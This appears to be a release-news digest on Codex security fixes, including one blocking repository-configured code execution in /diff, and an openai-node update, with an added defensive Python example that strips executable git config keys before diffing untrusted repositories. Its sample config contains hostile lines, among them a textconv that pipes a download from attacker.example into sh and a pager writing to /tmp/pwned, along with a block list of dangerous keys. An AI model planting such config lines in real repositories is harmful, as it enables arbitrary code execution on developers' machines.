
CODEX CLOSES THREE SECURITY GAPS WHILE NODE SDK STEADIES SHIPPING

By RepoJournal · Filed · About OpenAI

Codex patched a repository-configured code execution path in /diff and tightened Windows sandbox handling of network denials, and the Node SDK shipped 6.39.1 with a binary upload fix and clearer guidance on undici dispatcher mismatches.

Three fixes landed in Codex overnight, two of them closing attack surface. The most urgent: /diff now refuses repository-configured code execution helpers [1], closing a path where an untrusted repository could get arbitrary scripts run when a user invoked diagnostics. Separately, the Windows sandbox is now cancelled as soon as a network denial fires [2], rather than the sandboxed process lingering after the policy rejection. The third is vocabulary: configuration now uses "deny" instead of "none" for Unix socket permissions [3], matching the language the filesystem policy already uses.

On the Node SDK side, openai-node 6.39.1 [4] shipped with clearer guidance for undici dispatcher mismatches and a fix for binary upload handling, two friction points for production integrations.

The Codex team also reverted the app-server startup benchmark crate that broke musl builders [5], keeping the build clean, and wired task completion into the thread-idle lifecycle [6], moving idle-state management out of goal-runtime-specific code into generic lifecycle hooks for better composition.
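As an added illustration, not Codex's own code and not a description of how PR #24954 works, here is the pattern behind this class of fix: a tool that diffs a repository it does not trust must not let that repository's configuration choose a program to run. The Python below parses git-config syntax, separates the keys git would execute from cosmetic ones, and builds a git diff invocation that pins the executable-bearing settings from the command line, where they override every config file. EXEC_KEYS is a hand-picked, non-exhaustive subset of git-config(1) keys and is not the list Codex uses; the config text in SAMPLE is constructed for the example.

```python
"""Added example (illustrative, not Codex's code): run `git diff` on an
untrusted repository without letting repository-supplied config choose a
program to execute.

Assumptions: EXEC_KEYS is a hand-picked subset of git config keys whose value
git runs as a command (per git-config(1)); it is not exhaustive and not the
list Codex uses. SAMPLE is a constructed config, not one seen in the wild.
"""
import os
import re

# Config keys whose value git executes. "*" stands for a subsection name
# (diff.<driver>.textconv) or for any key in the section (alias.*, pager.*).
EXEC_KEYS = {
    "core.pager", "core.editor", "core.sshcommand", "core.gitproxy",
    "core.askpass", "core.fsmonitor", "diff.external",
    "diff.*.command", "diff.*.textconv", "merge.*.driver",
    "filter.*.clean", "filter.*.smudge", "filter.*.process",
    "credential.helper", "credential.*.helper", "gpg.program", "gpg.*.program",
    "sequence.editor", "uploadpack.packobjectshook", "alias.*", "pager.*",
}

_SECTION_RE = re.compile(r'^\[([A-Za-z0-9.-]+)(?:\s+"((?:[^"\\]|\\.)*)")?\]$')


def parse_git_config(text):
    """Parse git-config syntax into (section, subsection|None, name, value)."""
    entries, section, sub = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = _SECTION_RE.match(line)
        if m:
            section, sub = m.group(1).lower(), m.group(2)
            continue
        if section is None:
            raise ValueError(f"config key outside any section: {line!r}")
        name, _, value = line.partition("=")
        entries.append((section, sub, name.strip().lower(), value.strip()))
    return entries


def key_runs_command(section, sub, name):
    """True when git treats this key's value as a program to run."""
    if f"{section}.*" in EXEC_KEYS:
        return True
    pattern = f"{section}.{name}" if sub is None else f"{section}.*.{name}"
    return pattern in EXEC_KEYS


def partition_repo_config(text):
    """Split repo-supplied config into (forwardable, rejected) dotted key/value lists."""
    forwardable, rejected = [], []
    for section, sub, name, value in parse_git_config(text):
        dotted = ".".join(p for p in (section, sub, name) if p is not None)
        target = rejected if key_runs_command(section, sub, name) else forwardable
        target.append((dotted, value))
    return forwardable, rejected


def diff_invocation_for_untrusted_repo(repo_path, repo_config_text):
    """Return (argv, env, rejected) for a git diff the repo cannot redirect into a program."""
    forwardable, rejected = partition_repo_config(repo_config_text)
    argv = ["git", "-C", repo_path, "--no-pager"]
    for key, value in forwardable:  # cosmetic settings the tool is willing to honour
        argv += ["-c", f"{key}={value}"]
    # Command-line -c beats every config file, and the diff flags disable the
    # external-diff and textconv hooks even if some config still names one.
    argv += ["-c", "core.pager=cat", "diff", "--no-ext-diff", "--no-textconv", "--no-color"]
    # The environment can also point git at a program; drop those variables too.
    blocked = {"GIT_EXTERNAL_DIFF", "GIT_PAGER", "GIT_EDITOR", "GIT_SSH",
               "GIT_SSH_COMMAND", "GIT_ASKPASS", "GIT_CONFIG_PARAMETERS"}
    env = {k: v for k, v in os.environ.items() if k not in blocked}
    return argv, env, rejected


# Constructed sample: one benign cosmetic key and three keys that would run
# an attacker-chosen program during `git diff`.
SAMPLE = """\
[diff]
\tcolorMoved = default
\texternal = /tmp/evil-diff.sh
[diff "secrets"]
\ttextconv = curl -s https://attacker.example/p | sh
[core]
\tpager = sh -c 'id > /tmp/pwned'
"""

if __name__ == "__main__":
    argv, _env, rejected = diff_invocation_for_untrusted_repo("/work/repo", SAMPLE)
    print("rejected:", rejected)
    print("argv:", " ".join(argv))
```

The returned `rejected` list is worth logging rather than silently dropping: a repository that ships a `diff.external` or a textconv pointing at a pipe into `sh` is itself a signal, and the person running diagnostics should see it.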

References

  [1] openai/codex: fix(tui): prevent repository-configured code execution in /diff (#24954)
  [2] openai/codex: fix: cancel Windows sandbox on network denial (#19880)
  [3] openai/codex: fix(config): use deny for Unix socket permissions (#24970)
  [4] openai/openai-node: release: 6.39.1
  [5] openai/codex: Revert "Add app-server startup benchmark crate"
  [6] openai/codex: Wire task completion into thread-idle lifecycle

FAQ

What changed in OpenAI on May 29, 2026?
Codex patched a repository-configured code execution path in /diff and tightened Windows sandbox handling of network denials, and the Node SDK shipped 6.39.1 with a binary upload fix and clearer guidance on undici dispatcher mismatches.
What should OpenAI teams do about it?
Update openai-node to 6.39.1 if you upload binary data or pass a custom undici dispatcher • Update Codex before running /diff or other diagnostics in a repository you do not trust • Verify Windows sandbox network-denial behaviour in staging before the next deploy
Which OpenAI repositories shipped on May 29, 2026?
openai/codex, openai/openai-node
